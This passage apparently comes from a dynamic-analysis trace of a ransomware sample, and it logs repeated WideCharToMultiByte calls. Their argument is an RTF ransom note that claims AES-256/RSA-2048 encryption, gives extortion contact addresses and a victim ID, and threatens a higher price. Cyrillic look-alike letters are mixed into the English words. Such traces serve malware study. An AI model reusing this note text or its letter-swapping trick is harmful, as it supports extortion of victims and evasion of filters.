y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.010] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.010] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in 